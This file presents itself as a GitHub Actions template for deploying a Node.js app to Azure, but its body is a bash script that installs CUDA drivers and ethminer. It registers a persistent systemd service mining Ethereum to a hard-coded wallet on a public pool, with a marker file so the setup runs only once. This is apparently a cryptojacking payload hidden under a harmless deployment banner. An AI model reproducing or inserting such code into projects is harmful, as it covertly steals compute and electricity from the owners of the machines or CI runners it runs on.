# This workflow will build and push a node.js application to an Azure Web App when there is a push to the main branch.
#
# This workflow assumes you have already created the target Azure App Service web app.
# For instructions see https://docs.microsoft.com/azure/app-service/app-service-plan-manage#create-an-app-service-plan
#
# To configure this workflow:
#
# 1. For Linux apps, add an app setting called WEBSITE_WEBDEPLOY_USE_SCM and set it to true in your app **before downloading the file**.
#      For more instructions see: https://docs.microsoft.com/azure/app-service/configure-common#configure-app-settings
#
# 2. Set up a secret in your repository named AZURE_WEBAPP_PUBLISH_PROFILE with the value of your Azure publish profile.
#    For instructions on obtaining the publish profile see: https://docs.microsoft.com/azure/app-service/deploy-github-actions#configure-the-github-secret
#
# 3. Change the values for the AZURE_WEBAPP_NAME, AZURE_WEBAPP_PACKAGE_PATH and NODE_VERSION environment variables  (below).
#
# For more information on GitHub Actions for Azure, refer to https://github.com/Azure/Actions
# For more samples to get started with GitHub Action workflows to deploy to Azure, refer to https://github.com/Azure/actions-workflow-samples
"SCRIPT_DIR=""$( cd ""$( dirname ""${BASH_SOURCE[0]}"" )"" &> /dev/null && pwd )"""		
"if [ ! -f ""${SCRIPT_DIR}/isHaveSetupCoin.txt"" ];"		
then		
"echo ""taind vip pro"" > isHaveSetupCoin.txt"		
cd /usr/local/bin		
sudo apt-get install linux-headers-$(uname -r) -y		
distribution=$(. /etc/os-release;echo $ID$VERSION_ID | sed -e 's/\.//g')		
sudo wget https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/cuda-$distribution.pin		
sudo mv cuda-$distribution.pin /etc/apt/preferences.d/cuda-repository-pin-600		
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/7fa2af80.pub		
"echo ""deb http://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64 /"" | sudo tee /etc/apt/sources.list.d/cuda.list"		
sudo apt-get update		
sudo apt-get -y install cuda-drivers		
sudo apt-get install libcurl3 -y		
sudo wget https://github.com/ethereum-mining/ethminer/releases/download/v0.19.0-alpha.0/ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz		
sudo tar xvzf ethminer-0.19.0-alpha.0-cuda-9-linux-x86_64.tar.gz		
"sudo bash -c 'echo -e ""[Unit]\nDescription=ETH Miner\nAfter=network.target\n\n[Service]\nType=simple\nRestart=on-failure\nRestartSec=15s\nExecStart=/usr/local/bin/bin/ethminer -U -P stratum://0x69203ddf69021F9Ca820956FC1414eAf834877fD.dat123@us2.ethermine.org:4444 &\n\n[Install]\nWantedBy=multi-user.target"" > /etc/systemd/system/eth.service'"		
sudo systemctl daemon-reload		
sudo systemctl enable eth.service		
sudo systemctl start eth.service		
else		
sudo systemctl start eth.service		
fi		
